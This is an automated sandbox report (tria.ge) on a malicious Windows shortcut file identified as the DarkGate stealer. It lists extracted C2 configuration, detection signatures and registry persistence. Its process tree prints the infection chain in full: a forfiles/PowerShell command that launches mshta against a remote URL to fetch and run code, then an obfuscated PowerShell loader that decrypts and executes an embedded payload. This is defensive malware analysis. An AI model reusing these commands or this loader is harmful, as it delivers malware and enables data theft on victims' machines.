Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
160s -
max time network
172s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
12/03/2024, 03:44
Static task
static1
Behavioral task
behavioral1
Sample
a777dd29c0c24492eae7a4170d1599a5.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a777dd29c0c24492eae7a4170d1599a5.lnk
Resource
win10v2004-20240226-en
General
-
Target
a777dd29c0c24492eae7a4170d1599a5.lnk
-
Size
1KB
-
MD5
a777dd29c0c24492eae7a4170d1599a5
-
SHA1
a854b705c05dd4503d6de331cf1ad2716221c230
-
SHA256
f31c862a31ee968dafb32532059403438d2cfa5aaf8b5b1ad089b6ac027cec34
-
SHA512
5b0a100f1d0f61f3f87cc0f00e1be2096e009fe7b690dd37f32a4e3bb1d47495130e604f013ec1cf8f0616262b65d46090f5c3c81ee04172a9736a2b37994425
Malware Config
Extracted
http://206.188.196.222/w1
Extracted
darkgate
admin000
145.239.202.110
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
8094
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
WXMqRdAD
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin000
Signatures
-
Detect DarkGate stealer 11 IoCs
resource yara_rule behavioral2/memory/4672-140-0x0000000005930000-0x0000000005C7F000-memory.dmp family_darkgate_v6 behavioral2/memory/4476-145-0x00000000026A0000-0x0000000002E42000-memory.dmp family_darkgate_v6 behavioral2/memory/4672-146-0x0000000005930000-0x0000000005C7F000-memory.dmp family_darkgate_v6 behavioral2/memory/4476-150-0x00000000026A0000-0x0000000002E42000-memory.dmp family_darkgate_v6 behavioral2/memory/4552-161-0x0000000002B90000-0x0000000003332000-memory.dmp family_darkgate_v6 behavioral2/memory/4476-189-0x00000000026A0000-0x0000000002E42000-memory.dmp family_darkgate_v6 behavioral2/memory/4476-190-0x00000000026A0000-0x0000000002E42000-memory.dmp family_darkgate_v6 behavioral2/memory/4476-192-0x00000000026A0000-0x0000000002E42000-memory.dmp family_darkgate_v6 behavioral2/memory/4552-201-0x0000000002B90000-0x0000000003332000-memory.dmp family_darkgate_v6 behavioral2/memory/4476-252-0x00000000026A0000-0x0000000002E42000-memory.dmp family_darkgate_v6 behavioral2/memory/4552-253-0x0000000002B90000-0x0000000003332000-memory.dmp family_darkgate_v6 -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 4672 created 2412 4672 Autoit3.exe 72 PID 4672 created 988 4672 Autoit3.exe 83 PID 4672 created 680 4672 Autoit3.exe 7 PID 4476 created 2640 4476 GoogleUpdateCore.exe 48 -
Blocklisted process makes network request 3 IoCs
flow pid Process 18 2224 mshta.exe 33 3744 powershell.exe 34 3744 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 4672 Autoit3.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EEaEaec = "C:\\ProgramData\\fkbhcdd\\Autoit3.exe C:\\ProgramData\\fkbhcdd\\ekhaadf.a3x" GoogleUpdateCore.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 760 powershell.exe 760 powershell.exe 5084 powershell.exe 5084 powershell.exe 3744 powershell.exe 3744 powershell.exe 4672 Autoit3.exe 4672 Autoit3.exe 4672 Autoit3.exe 4672 Autoit3.exe 4672 Autoit3.exe 4672 Autoit3.exe 4672 Autoit3.exe 4672 Autoit3.exe 4476 GoogleUpdateCore.exe 4476 GoogleUpdateCore.exe 4476 GoogleUpdateCore.exe 4476 GoogleUpdateCore.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 4552 GoogleUpdateCore.exe 4552 GoogleUpdateCore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4476 GoogleUpdateCore.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 760 powershell.exe Token: SeDebugPrivilege 5084 powershell.exe Token: SeDebugPrivilege 3744 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1804 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe 1804 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1600 wrote to memory of 4732 1600 cmd.exe 91 PID 1600 wrote to memory of 4732 1600 cmd.exe 91 PID 4732 wrote to memory of 760 4732 forfiles.exe 92 PID 4732 wrote to memory of 760 4732 forfiles.exe 92 PID 760 wrote to memory of 2224 760 powershell.exe 93 PID 760 wrote to memory of 2224 760 powershell.exe 93 PID 2224 wrote to memory of 5084 2224 mshta.exe 95 PID 2224 wrote to memory of 5084 2224 mshta.exe 95 PID 5084 wrote to memory of 3744 5084 powershell.exe 97 PID 5084 wrote to memory of 3744 5084 powershell.exe 97 PID 3744 wrote to memory of 1804 3744 powershell.exe 100 PID 3744 wrote to memory of 1804 3744 powershell.exe 100 PID 3744 wrote to memory of 1804 3744 powershell.exe 100 PID 1804 wrote to memory of 2768 1804 AcroRd32.exe 104 PID 1804 wrote to memory of 2768 1804 AcroRd32.exe 104 PID 1804 wrote to memory of 2768 1804 AcroRd32.exe 104 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 4884 2768 RdrCEF.exe 107 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108 PID 2768 wrote to memory of 2676 2768 RdrCEF.exe 108
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:4476
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2640
-
C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe"2⤵
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4552
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2412
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca1⤵PID:988
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\a777dd29c0c24492eae7a4170d1599a5.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://206.188.196.222/w12⤵
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exestart mshta http://206.188.196.222/w13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" http://206.188.196.222/w14⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $KwYpv = 'AAAAAAAAAAAAAAAAAAAAAEzs+9D77CG0GJH50MpYmOojggymvqfNwT2BwwMZ6Zch1NPQ4AaEOsRMLSsp37BXwgQFAcJXARJMw4KNZ6Y7TW/7d/nu7pzfbiyFeMXeJ/G7I+yEjYPlZ8DUExyMMos/vJAnGl8usgEZloGvRz8TUIcrZNDIcfk/B3F5cgw/gplSXLesuAC5iZvkjvEu4ZkyJG2ruIZT4E9K3VGLm97lYCyJeriEvUpS7f4nPfXGqN0Xt2cKdd+1Fcuq+tewAqdoUhkrSJypQw+eY6VcnBnzimnZ2DrH3ZJEkVQQAu5pgY5U4T3OK+4nVOiMMxnzy62vZcQB2pW4nMuCptYW5UL69nNNXBr9RfmPdPNlb3K9FYgBb9yEWlkJ09LgDgXUzGxe/JMoRCvNyoodUu3jSjBg7lJdnmUsk3S7OfFGBemQdj2lRAvSvDRr6V7HuKyohVR78wXrOdmsRr41xwEfnfFidvxhlSge/UfvIw+U/62JVt/z7eRnSeDytb5JrmrzGaYy6mcKVD10Qg3+BJi2pkcks1mjOsSkB+Y1yt6ka4GJ/fTfAqtwINI7W4P3iDlVt5+MRQIgnvbCbz0acqjO1hhWVa9FgGwYxTGdaybvFxIKJbMPZSxBRqx8Yf6hNfxwTNyzXn8QKBcHUEQrli7eBTKdEckO2/tpJXihaZoJIiuuufnnAvMpPDCMF+L0JKJV5DX/VHTpGbLRLe9nWvLQWHXxaf3JMUsa2zVmve/N/MMvFNMMTlVj17Pcnj2QTLr5M8sf1c6hmobwegCyUFtdQMCsjw3e9wYHR0Loj7gQmQV9DTtSlM+oqgzWvePRoI2EqPvi5UUvVbKzHYdAmufFIhDGfWdM46b0C4upLOTyNCiyYUMtmdbExfrGWfpG4S0l354r3uuyK2ptWfcACANia4Hsl4EI3abMngZ/gLTJ1gDmhLSJr3W8hV9rnaXvugiJQO7R2VVqOIjc/cGxM6UAV4n3cqvjF7Qd8yvNHnQGdCNTqXQE9W4NWUHRoZfdojbqfzngNA==';$qUoZKXum = 'RU1nU1ptd1B5dEJPQkRUQ2l6WFZUYXBjWWxNblJEZG4=';$kbbrdQK = New-Object 'System.Security.Cryptography.AesManaged';$kbbrdQK.Mode = [System.Security.Cryptography.CipherMode]::ECB;$kbbrdQK.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$kbbrdQK.BlockSize = 128;$kbbrdQK.KeySize = 256;$kbbrdQK.Key = [System.Convert]::FromBase64String($qUoZKXum);$LGvCV = [System.Convert]::FromBase64String($KwYpv);$QwRLGiHB = $LGvCV[0..15];$kbbrdQK.IV = $QwRLGiHB;$hBUppQDnl = $kbbrdQK.CreateDecryptor();$MoYXNlkIj = $hBUppQDnl.TransformFinalBlock($LGvCV, 16, $LGvCV.Length - 16);$kbbrdQK.Dispose();$NeMj = New-Object System.IO.MemoryStream( , $MoYXNlkIj );$NjSGYp = New-Object System.IO.MemoryStream;$iiYETcerF = New-Object System.IO.Compression.GzipStream $NeMj, ([IO.Compression.CompressionMode]::Decompress);$iiYETcerF.CopyTo( $NjSGYp );$iiYETcerF.Close();$NeMj.Close();[byte[]] $iFVgn = $NjSGYp.ToArray();$peosnCLg = [System.Text.Encoding]::UTF8.GetString($iFVgn);$peosnCLg | powershell -5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -6⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3744 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"7⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140438⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C1E0DE53EF91292E4DDB6FAADD7D77BB --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:29⤵PID:4884
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=02E75EC852AA0B198E8DEC5C91E676B7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=02E75EC852AA0B198E8DEC5C91E676B7 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:19⤵PID:2676
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7FE5022DEBD9BD33D8DEA657D7C8E7DB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7FE5022DEBD9BD33D8DEA657D7C8E7DB --renderer-client-id=4 --mojo-platform-channel-handle=2172 --allow-no-sandbox-job /prefetch:19⤵PID:784
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FD816A66CC6BEBAF45053FF1B5F53EBF --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:29⤵PID:768
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=09C61B507E187CA1350F5E65A8964BB0 --mojo-platform-channel-handle=1888 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:29⤵PID:3796
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA771999DAE75C3A56B780520333F11E --mojo-platform-channel-handle=2524 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:29⤵PID:3848
-
-
-
-
C:\Users\Admin\AppData\Roaming\Autoit3.exe"C:\Users\Admin\AppData\Roaming\Autoit3.exe" C:\Users\Admin\AppData\Roaming\script.a3x7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4672
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3936
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55889649fbb862b6b6a9a0b56fbf61be4
SHA14dccc89f5111aeb64987e1da69cd950fe5458d2d
SHA2564e6e72bf47c98b9f78428ed5a1fed3dac7d1d781c5ae39bb2460b2064ad1df03
SHA5120b201d6df48e963923bff2f011e3a9986c70fc28a6525d1880b64216a9ac0a7be7b07ead5e730e03f360b75dad30e27944cc35f8c2100682fabfd4a339086933
-
Filesize
475KB
MD5c3ad99769dd08a8bef87f9e3558e9b70
SHA1bbe29d7ac320ec73b2f05482402d8e6824ce8c0a
SHA2561316cffb55a8e5284d927b683be1ccd72c696ad28e5bc0aa9eb8d915e1dc8065
SHA512dc14821126838fa0e6cc0fc5f95d79e63a0aaa2a8d3cdf3412adefd316d0daf293f99383b5227973c7a4f8127a7aa215c001b217a6393337753dae11b0a2cb5e
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
